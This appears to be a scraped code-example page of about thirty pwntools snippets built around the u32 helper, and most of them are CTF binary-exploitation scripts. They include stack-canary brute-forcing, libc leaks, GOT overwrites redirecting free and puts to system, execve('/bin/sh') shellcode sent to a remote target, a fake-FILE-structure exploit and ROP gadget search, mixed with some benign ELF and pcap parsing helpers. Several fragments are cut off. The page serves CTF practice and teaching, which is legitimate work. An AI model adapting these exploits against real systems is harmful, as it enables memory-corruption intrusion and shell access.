Exemple #1
0
def hookCode(mu, addr, size, userData):
    #  print ">>> Tracing instruction at 0x%x, instruction size = 0x%x" % (addr, size)

    funcEntry = 0x400670
    funcRet = [0x4006F1, 0x400709]

    skipList = [0x4004EF, 0x4004F6, 0x400502, 0x40054F]
    if addr in skipList:
        mu.reg_write(RIP, addr + size)

    elif addr == 0x400560:
        print chr(mu.reg_read(RDI)),
        mu.reg_write(RIP, addr + size)

    elif addr == funcEntry:
        arg0 = mu.reg_read(RDI)
        rrsi = mu.reg_read(RSI)
        arg1 = u32(mu.mem_read(rrsi, 4))

        if (arg0, arg1) in d:
            (retVal, retRef) = d[(arg0, arg1)]
            mu.reg_write(RAX, retVal)
            mu.mem_write(rrsi, p32(retRef))
            mu.reg_write(RIP, 0x400582)

        else:
            stack.append((arg0, arg1, rrsi))

    elif addr in funcRet:
        (arg0, arg1, rrsi) = stack.pop()

        retVal = mu.reg_read(RAX)
        retRef = u32(mu.mem_read(rrsi, 4))
        d[(arg0, arg1)] = (retVal, retRef)
Exemple #2
0
def zero_recv():
    magic = recv(1)
    assert magic == '\xdd'
    data_length = u32(recv(4), endian='big')
    #log.info('data_length {}'.format(data_length))
    data = recv(data_length)
    #log.info('data {}'.format(hexdump(data)))
    data_crc32 = u32(recv(4), endian='big')
    assert crc.crc_32(data) == data_crc32
    #log.info(data.encode('hex'))
    return zero_unpack(data)
Exemple #3
0
def bruteforce_canary():
    padding = 'A' * ExploitInfo.offset_canary
    leak_canary = ''

    for x in xrange(ExploitInfo.CANARY_SIZE):
        count = ExploitInfo.offset_canary + x + 1
        log.info("count         : %d", count)
        canary_byte = 0
        while canary_byte < 0x100:
            p = process(ExploitInfo.name)

            p.clean()
            p.sendline(str(count))

            payload = padding
            payload += leak_canary + chr(canary_byte)

            # log.info("len(payload)  : %d", len(payload))
            log.info("payload       : %r", payload)

            p.clean()
            p.send(payload)

            p.wait_for_close()
            if p.poll() == 0:
                leak_canary += chr(canary_byte)
                log.info("current canary: 0x%x", u32(leak_canary.ljust(ExploitInfo.CANARY_SIZE, '\x00')))
                break
            p.close()
            canary_byte += 1

    return leak_canary
Exemple #4
0
def parse_rela_plt(elffile, dynsym):
    rela_plt = elffile.get_section_by_name('.rela.plt').data()
    res = []
    for idx in range(len(rela_plt) / 0x18):
        tmp = rela_plt[idx * 0x18 + 12:idx * 0x18 + 16]
        tmp = u32(tmp)
        res.append(dynsym[tmp])
    return res
Exemple #5
0
def encode_instructions(asm_str):
    shellcode = pwn.asm(asm_str)

    if len(shellcode) > 4:
        pwn.log.error(
            'shellcode {shellcode} is too long, shorten it to 4 bytes or less'.
            format(shellcode=shellcode))
    return pwn.u32(shellcode.ljust(4, b'\x00'))
Exemple #6
0
 def recv_libc_leak(self, ignore_str=b'', recv_count=4):
     if len(ignore_str) > 0:
         self.proc.recvuntil(ignore_str)
     leak = self.proc.recv(recv_count)
     leak = pwn.u32(leak.ljust(4, b'\x00'))
     self.set_libc_offset(leak_function=self.leak_function,
                          leak_address=leak)
     return leak
Exemple #7
0
 def repair_one_file(path):
     with open(path, "rb") as f:
         data = f.read()
     data = bytearray(data)
     data[0:2] = b"MZ"
     pe_addr = u32(data[0x3c:0x3c+4])
     data[pe_addr:pe_addr+2] = b"PE"
     return data
Exemple #8
0
def leak(addr):
	payload = b'y ' + pwn.p32(addr) + b'A' * 4 + pwn.p32(0x8049f08)
	io.sendline('4')
	io.recvuntil('Let me check your cart. ok? (y/n) > ')
	io.send(payload)
	io.recvuntil('27: ')
	data = pwn.u32(io.recv(4))
	io.recvuntil('> ')
	return data
Exemple #9
0
def leak_stack():
    puts_got = elf.got[b'puts']
    io.recvuntil('> ')
    offset = 0xc8
    index = (puts_got - command) // 4
    io.sendline(str(index) + 'A' * (60 - len(str(index)) - 1))
    data = io.recv(64)[60:]
    data = pwn.u32(data)
    return data - offset
Exemple #10
0
def get_data():
    pcap = pyshark.FileCapture("ananas.pcapng")
    """seed"""
    cap0 = pcap[978]
    seed = u32(unhexlify(str(cap0.data.data)))
    """data"""
    cap1 = pcap[979]
    cap2 = pcap[981]
    data = unhexlify(cap1.data.data + cap2.data.data)
    return seed, list(data)
Exemple #11
0
 def _load32_popret(self):
     from collections import defaultdict
     leaesp_byte = '\x8d\x64\x24'
     leaesp_word = '\x8d\xa4\x24'
     addesp_byte = '\x83\xc4'
     addesp_word = '\x81\xc4'
     popr = map(chr, [0x58, 0x59, 0x5a, 0x5b, 0x5d, 0x5e, 0x5f])
     popa = '\x61'
     ret = '\xc3'
     poprets = defaultdict(list)
     for data, addr in self.elf.executable_segments():
         i = 0
         while True:
             i = data.find(ret, i)
             if i == -1: break
             s = [(i, 0)]
             while len(s) > 0:
                 off, size = s.pop(0)
                 gaddr = addr + off
                 poprets[size].append(gaddr)
                 if data[off - 1] in popr:
                     s.append((off - 1, size + 1))
                 if data[off - 1] == popa:
                     s.append((off - 1, size + 7))
                 if data[off - 3:off - 1] == addesp_byte:
                     x = pwn.u8(data[off - 1])
                     if x % 4 == 0 and x < 128:
                         s.append((off - 3, size + x // 4))
                 if data[off - 6:off - 1] == addesp_word:
                     x = pwn.u32(data[off - 4])
                     if x % 4 == 0:
                         s.append((off - 3, size + x // 4))
                 if data[off - 4:off - 1] == leaesp_byte:
                     x = pwn.u8(data[off - 1])
                     if x % 4 == 0 and x < 128:
                         s.append((off - 3, size + x // 4))
                 if data[off - 7:off - 1] == leaesp_word:
                     x = pwn.u32(data[off - 4])
                     if x % 4 == 0:
                         s.append((off - 3, size + x // 4))
             i += 1
     self._gadgets['popret'] = dict(poprets)
Exemple #12
0
def find_symbol(pr, canary, num):
    elf = pwn.ELF(target, False)
    payload = b'A' * 512 + pwn.p32(canary) + b'B' * 12
    payload += pwn.p32(elf.plt['puts'])
    payload += pwn.p32(elf.sym['win'])
    payload += pwn.p32(elf.got['puts'])
    pr.sendlineafter("What number would you like to guess?\n", str(num))
    pr.sendlineafter("New winner!\nName? ", payload)
    pr.readline()
    pr.readline()
    return pwn.u32(pr.readline()[:4])
Exemple #13
0
 def leak32(self):
     if len(self.leak[self.lenght:]) > 0:
         s = self.leak[self.lenght:]
         if len(s) % 4 == 0:
             l = []
             for x in range(0, len(s), 4):
                 pp = hex(u32(s[x:x + 4]))
                 if len(pp[2:]) % 4 == 0:
                     if len(pp[2:]) == 8:
                         l.append(pp)
                     else:
                         l.append('0x0000' + pp[2:])
                 else:
                     if len(pp[2:]) < 4:
                         pp = '0x0000' + '0' * (4 -
                                                (len(pp[2:]) % 4)) + pp[2:]
                         l.append(pp)
                     else:
                         pp = '0x' + '0' * (4 - (len(pp[2:]) % 4)) + pp[2:]
                         l.append(pp)
             self.xxx = l
         else:
             s = s + '\x00' * (4 - (len(s) % 4))
             l = []
             for x in range(0, len(s), 4):
                 pp = hex(u32(s[x:x + 4]))
                 if len(pp[2:]) % 4 == 0:
                     if len(pp[2:]) == 8:
                         l.append(pp)
                     else:
                         l.append('0x0000' + pp[2:])
                 else:
                     if len(pp[2:]) < 4:
                         pp = '0x0000' + '0' * (4 -
                                                (len(pp[2:]) % 4)) + pp[2:]
                         l.append(pp)
                     else:
                         pp = '0x' + '0' * (4 - (len(pp[2:]) % 4)) + pp[2:]
                         l.append(pp)
             self.xxx = l
     return self.xxx
Exemple #14
0
    def load_dump(self):
        Triton = self.triton
        log = self.log

        # Open the dump
        fd = open(self.dumpfile)
        data = eval(fd.read())
        fd.close()

        # Extract registers and memory
        regs = data[0]
        mems = data[1]
        gs_8 = data[2]

        context.arch = 'i386'

        # Load memory into memoryCache
        log.debug('Define memory areas')
        for mem in mems:
            start = mem['start']
            end   = mem['end']
            log.debug('Memory caching %x-%x' %(start, end))
            if mem['memory']:
                self.memoryCache.append({
                    'start':  start,
                    'size':   end - start,
                    'memory': mem['memory'],
                })

        # Make sure to restore gs register first
        from pwn import u32
        self.setreg('gs', regs['gs'])
        for i in range(7):
            log.debug('Restore gs[0x%x]' % (i*4))
            v = u32(self.getMemory(gs_8 + i*4, 4))
            write_gs = ['mov eax, %s' % hex(v), 'mov gs:[%d], eax' % (i*4)]
            for inst in write_gs:
                asm_code = asm(inst)
                instruction = Instruction()
                instruction.setOpcode(asm_code)
                instruction.setAddress(0)
                Triton.processing(instruction)

        # Load registers into the triton
        log.debug('Define registers')
        for reg, value in regs.items():
            log.debug('Load register ' + reg)
            self.setreg(reg, value)

        return       
Exemple #15
0
def parse_dynsym(elffile):
    dynsym = elffile.get_section_by_name('.dynsym').data()
    dynstr = elffile.get_section_by_name('.dynstr').data()
    strlist = ['None']
    for idx in range(len(dynsym) / 0x18):
        if idx == 0:
            continue
        else:
            sym = dynsym[idx * 0x18:idx * 0x18 + 0x18]
            offset = sym[:4]
            offset = u32(offset)
            tmpstr = dynstr[offset:].split('\x00')[0]
            strlist.append(tmpstr)
    return strlist
Exemple #16
0
def main():
    leak_canary = p32(0x2c567834)
    if args.RESTART:
        leak_canary = bruteforce_canary()

    # Now exploit it!
    log.success("Const canary: 0x%x", u32(leak_canary))

    p = process(ExploitInfo.name)

    payload = 'A' * ExploitInfo.offset_canary
    payload += leak_canary
    payload += 'A' * (ExploitInfo.offset_canary_eip - 4)
    payload += p32(ExploitInfo.elf.symbols['win'])

    log.info("payload       : %r", payload)

    count = len(payload)

    p.clean()
    p.sendline(str(count))
    p.send(payload)
    print(p.recv(4096))
Exemple #17
0
def third_attempt(remote):
    length_before_return_address = 0x14
    write_address = 0x08048087
    payload = b'A' * length_before_return_address + pwn.p32(write_address)
    remote.send(payload)

    esp_bytes = 4
    bytes_to_receive = 0x14
    esp = pwn.u32(remote.recv(esp_bytes))
    pwn.info('ESP was %d' % esp)
    remote.recv(bytes_to_receive - esp_bytes)  # Not used

    # shellcode = pwn.asm(pwn.shellcraft.sh())  # too long, manually reduced below
    shellcode = pwn.asm(
    '''
        push 0x68
        push 0x732f2f2f
        push 0x6e69622f
        mov ebx, esp
        xor ecx, ecx
        xor edx, edx
        /* call execve() */
        push 11 /* 0xb */
        pop eax
        int 0x80
    ''')

    payload = b'A' * length_before_return_address + \
        pwn.p32(esp + length_before_return_address) + \
        shellcode

    assert len(payload) <= 60, len(payload)
    remote.send(payload)
    remote.sendline('cat /home/start/flag')
    pwn.success('Flag is: %s' % remote.recvuntil('\n').rstrip().decode('utf8'))
    remote.interactive()
def grossLeak(leak, payload):
    try:
        # Get what we're interested in.
        leak = "'$'".join(
            leak.split("': No such file")[0].split(
                payload[-4:])[1:]).split("'$'")
        # Remove empty elements.
        leak = [l for l in leak if len(l) > 0]
        # Converting from "\\xx\\xx\\xx" ascrii representation to raw bytes.
        for i, x in enumerate(leak):
            if x[0] == '\\':
                try:
                    leak[i] = ''.join([
                        "\\{}".format(p).decode("string_escape")
                        for p in x.split('\\') if p != ''
                    ])
                except:
                    leak[i] = x
        leak = ''.join(leak).replace("''", "")
    except Exception as e:
        print("Unlucky", e)
        exit(0)
    # Finally, unpack raw bytes.
    return pwn.u32(leak.ljust(4, '\x00')[:4])
Exemple #19
0
n += pwn.p32(0)  # no next note
n += pwn.p32(2137)  # ID 2137
n += pwn.p32(1)  # data length 1
n += pwn.p32(GOT_FREE)  # data pointing to free@got
n += "a" * 40 + "\x00"  # timestring
# Add a new note with n as data, thereby overflowing the A note memory with
# our crafted structure
note_add(r, n, False)

# Show notes, parse note a content as free@libc
menu(r, 1)
data = r.recvuntil('\n')
for line in data.split('\n'):
    note = line.split()[2]
    note = note.split(':')[1]
    free = pwn.u32(note[:4])
    break
pwn.log.info('free@libc is 0x{:08x}'.format(free))

## STEP 2 - override free@got with system@got
r = connect()
pwn.log.info('Triggering GOT override')

# Add a few notes with our CMD as the content (the CMD buffer will then be
# free()'d, so system()'d after our GOT override
NUM_NOTES = 3
for i in range(NUM_NOTES):
    pwn.log.info("Adding note {} of {}".format(i + 1, NUM_NOTES))
    note_add(r, CMD, False)
    time.sleep(1)
Exemple #20
0
def u32(b):
    return pwn.u32(b)
Exemple #21
0
    con.sendline("3")
    con.sendline("2")
    con.sendline("156")
    con.sendline("/bin/sh\x00" + "D" * 144 + p32(FREE_GOT))

    # display user 2
    # displaying the user to leak the address of free, and then calculate the libc base (its changing every run)
    con.sendline("2")
    con.sendline("1")

    con.recvuntil("description:")
    con.recvuntil("description:")
    con.recvuntil("description:")
    con.recvuntil("description:")

    leak = u32(con.recvuntil("0:")[1:5])
    libc_base = leak - FREE_GOT_OFFSET

    print "leaked free(): 0x{:08x}".format(leak)
    print "leaked libc base: 0x{:08x}".format(libc_base)

    # change user 2
    # we acutally overwriting the GOT table entry of free to system, because we overwrited the pointer
    con.sendline("3")
    con.sendline("1")
    con.sendline("4")
    con.sendline(p32(libc_base + SYSTEM_LIBC_OFFSET))

    # then just trigger delete, that use free, but actually calling to system with pointer to what to "free" so calling:
    # system("/bin/sh") :)
    con.sendline("1")
Exemple #22
0
a = open("libvault.so", "rb").read()

off = 0x1720
data1 = a[off:][:128]

key = "Love"

res = [0] * 128
for i in range(0, 128, 2):
    res[i] = chr(ord(data1[i]) ^ ord(key[i & 2]))
    res[i + 1] = chr(ord(data1[i + 1]) ^ ord(key[(i + 1) & 3]))
res = "".join(res)
print(len(res))

key = ""
for i in range(0, 0x20):
    curval = 0
    for j in range(4):
        curval ^= ord(res[4 * i + j])
    key += chr(curval)
print(key)
print(key.encode("hex"))

ciphertext = a[0x1620:0x16d0]
ct = ""
for i in range(0, len(ciphertext), 4):
    curval = u32(ciphertext[i:i + 4])
    ct += chr(curval)
print(ct.encode("hex"))
Exemple #23
0
elf = pwn.ELF('./hash')
libc = pwn.ELF('/lib/i386-linux-gnu/libc.so.6')

# leak libc address
ropgadget = ''.join(
    map(pwn.p32, [elf.plt['puts'], elf.sym['main'], elf.got['getchar']]))
payload = 'A' * 512 + pwn.p32(canary) + 'A' * 8 + pwn.p32(
    elf.sym['g_buf']) + ropgadget
payload = b64encode(payload)
io.recvuntil('Encode your data with BASE64 then paste me!')
io.sendline(payload)
io.recvuntil('MD5(data) : ')
io.recvline()

# calculate system and find '/bin/sh'
libc_getchar = pwn.u32(io.recv(4))
base = libc_getchar - libc.sym['getchar']
libc_system = base + libc.sym['system']
addr_shell = base + next(libc.search('/bin/sh'))
'''
second round
'''
io.recvuntil('Are you human? input captcha : ')
captcha = io.recvline()
io.send(captcha)

# calculate canary
canaryio = pwn.process('./canary')
canaryio.sendline(captcha)
canary = int(canaryio.recvline())
canary = int2uint(canary)  # turn signed int to unsigned int
Exemple #24
0
 def toaddr((host, port)):
     import socket
     return '%08X:%04X' % (pwn.u32(socket.inet_aton(host)), port)
Exemple #25
0
 def get_value(self):
     if len(self._value) <= 4 and not self.is_special_mem():
         return u32(self._value.ljust(4, '\x00'))
     else:
         return self._value
Exemple #26
0
    def pwn(self):
        pwn.log.info("Starting pwning...")

        self.elf.address = self.get_leak("a" * 8) - 0x1090
        self.libc.address = self.get_leak("a" * 16) - 0x3e82a0
        system = self.libc.symbols['system']
        ch = self.elf.symbols['ch']
        _IO_file_jumps = self.libc.symbols['_IO_file_jumps']
        _IO_str_overflow_ptr = _IO_file_jumps + 0xd8
        _IO_2_1_stderr_ = self.libc.symbols['_IO_2_1_stderr_']
        sh = next(self.libc.search(b"/bin/sh"))
        print("SH: ", sh)

        self.set_name(b'AAAA')

        readable = self.elf.symbols['numbers']

        fake_file = pwn.flat([
            pwn.p64(0),  # flags
            pwn.p64(readable),  # _IO_read_ptr
            pwn.p64(readable),  # _IO_read_end
            pwn.p64(readable),  # _IO_read_base
            pwn.p64(0),  # _IO_write_base
            pwn.p64((sh - 100) // 2),  # _IO_write_ptr * 
            pwn.p64(readable),  # _IO_write_end
            pwn.p64(0),  # _IO_buf_base
            pwn.p64((sh - 100) // 2),  # _IO_buf_end *
            pwn.p64(0),  # _IO_save_base
            pwn.p64(0),  # _IO_backup_base
            pwn.p64(0),  # _IO_save_end
            pwn.p64(0),  # _IO_marker
            pwn.p64(_IO_2_1_stderr_),  # _IO_chain
            pwn.p32(3),  # _fileno
            pwn.p32(0),  # 
            pwn.p64(readable),  # _IO_lock_t
            pwn.p64(0),
            pwn.p64(readable),
            pwn.p64(0),
            pwn.p64(0),
            pwn.p64(0),
            pwn.p64(0),
            pwn.p64(0),
            pwn.p64(0),
            pwn.p64(0),
            pwn.p64(0),
            pwn.p64(0),
            pwn.p64(_IO_str_overflow_ptr - 0x10),
            pwn.p64(system)
        ])

        pwn.log.info("binary           @ %s" % hex(self.elf.address))
        pwn.log.info("ch               @ %s" % hex(ch))
        pwn.log.info("libc             @ %s" % hex(self.libc.address))
        pwn.log.info("system           @ %s" % hex(system))
        pwn.log.info("_IO_file_jumps   @ %s" % hex(_IO_file_jumps))
        pwn.log.info("/bin/sh          @ %s" % hex(sh))

        n = 64
        self.set_n_subjects(n)

        size = 8
        chunks = [
            fake_file[i:i + size] for i in range(0, len(fake_file), size)
        ]
        for chunk in chunks:
            n -= 2
            lo = self.convert_to_float(pwn.u32(chunk[0:4]))
            hi = self.convert_to_float(pwn.u32(chunk[4:8]))
            self.add_subject(lo)
            self.add_subject(hi)

        while n > 0:
            self.add_subject(0.0)
            n -= 1

        #raw_input("a")
        lo = self.convert_to_float(ch & 0xffffffff)
        self.add_subject(lo)
Exemple #27
0
def d2s (i):
  res = i & 0xffffffff
  if res > 0x7fffffff:
    res = (-0x100000000 + res) 
  return res 

def intbracket (s):
  res = 0 
  for c in s:
    res = d2s(res * 10 + b2s(c) - 0x30)
  return res 

def get_random_zero (i):
  return ''.join([choice(zeros).encode('utf-8') for _ in xrange(i)])

target1 = pwn.u32("/bin") & 0xffff0000
target2 = pwn.u32("/sh\x00") & 0xffff0000

for aux in xrange(len(digits) / 10):
  for i in zeros:
    for j in xrange (100000):
      for k in range (10):
        #raw = (intbracket(i.encode('utf-8') + "0"*k + str(j))) & 0xffffffff
        raw = (intbracket(i.encode('utf-8') + "0"*k + str(j/10) + digits[j%10 + 10*aux].encode('utf-8'))) & 0xffffffff
        if (raw & 0xffff0000) == target1:
          #print i.encode('utf-8') + "0"*k + str(j)
          print i.encode('utf-8') + "0"*k + str(j/10) + digits[j%10 + 10*aux].encode('utf-8')
          print hex(raw)
        if (raw & 0xffff0000) == target2:
          #print i.encode('utf-8') + "0"*k + str(j)
          print i.encode('utf-8') + "0"*k + str(j/10) + digits[j%10 + 10*aux].encode('utf-8')
Exemple #28
0
def test_matching():
    assert u32(fmtStr[elf.symbols['myVar']]) == get_myVar()
Exemple #29
0
add_note(24, 'AAAAAAA')
add_note(24, 'BBBBBBB')

delete_note(1)
delete_note(0)

# write data to ptr[1]
puts_func = 0x804862b
puts_got = elf.got[b'puts']
data = pwn.p32(puts_func) + pwn.p32(puts_got)
add_note(8, data)

# leak system address
leak = print_note(1)
puts_libc = pwn.u32(leak)
libc_base = puts_libc - libc.sym[b'puts']
system_libc = libc_base + libc.sym[b'system']

# write data to ptr[1] again
delete_note(2)
data = pwn.p32(system_libc) + b';sh'  # get rid of junk value
add_note(8, data)

# print_note(1) without `io.recvuntil(':')' and `return io.recvline()'
io.recvuntil(':')
io.sendline('3')
io.recvuntil(':')
io.sendline('1')

io.interactive()
Exemple #30
0
1. leak libc address
2. change putchar to main
"""
payload = b''
payload += shift_left(now - elf.got[b'setvbuf'])
payload += read_data(4)
payload += shift_right(elf.got[b'putchar'] - now)
payload += write_data(4)
payload += b'.'

io.sendline(payload)
sleep(1)
io.send(pwn.p32(elf.sym[b'main']))

get = io.recv(4)
setvbuf_addr = pwn.u32(get)
libc_addr = setvbuf_addr - libc.sym[b'setvbuf']
"""
overwrite: memset ->  gets
           fgets  ->  system
"""

io.recvuntil('[ ]\n')
now = elf.sym[b'tape']

payload = b''
payload += shift_left(now - elf.got[b'memset'])
payload += write_data(4)
payload += shift_left(now - elf.got[b'fgets'])
payload += write_data(4)
payload += b'.'